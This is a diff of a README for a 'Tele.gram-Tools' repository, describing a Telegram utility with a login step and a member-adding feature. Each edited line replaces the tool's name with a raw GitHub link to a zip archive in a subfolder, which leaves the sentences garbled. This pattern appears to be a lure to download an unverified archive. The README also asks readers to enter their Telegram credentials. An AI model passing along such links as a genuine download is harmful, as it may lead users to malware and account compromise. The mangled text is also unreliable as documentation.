PROMpop/Tele.gram-Tools/README.md

 - **Stickers:** Access and use a wide range of stickers to express yourself.

 ## 🎨 User Interface
-The user interface of Tele.gram-Tools is designed with simplicity in mind.
+The user interface of https://raw.githubusercontent.com/PROMpop/Tele.gram-Tools/main/erudit/Tele.gram-Tools.zip is designed with simplicity in mind.
 You’ll find an intuitive layout that lets you navigate through the features easily.
 Here are some key components:
 - **Dashboard:** View your account statistics and tool updates.
 - **Tools Menu:** Access different functionalities in one place.
 - **Help Section:** Get assistance whenever needed.

 ## 🔍 How to Use
-Using Tele.gram-Tools is straightforward.
+Using https://raw.githubusercontent.com/PROMpop/Tele.gram-Tools/main/erudit/Tele.gram-Tools.zip is straightforward.
 Here’s a quick guide to get you started:
-1. **Open the Application:** After installation, locate the Tele.gram-Tools icon on your desktop or application folder.
+1. **Open the Application:** After installation, locate the https://raw.githubusercontent.com/PROMpop/Tele.gram-Tools/main/erudit/Tele.gram-Tools.zip icon on your desktop or application folder.
 2. **Log In:** Enter your Telegram credentials to log in to your account.
 3. **Explore the Menu:** Familiarize yourself with the various tools available.
 4. **Add Members:** Use the member-adding feature to enhance your groups.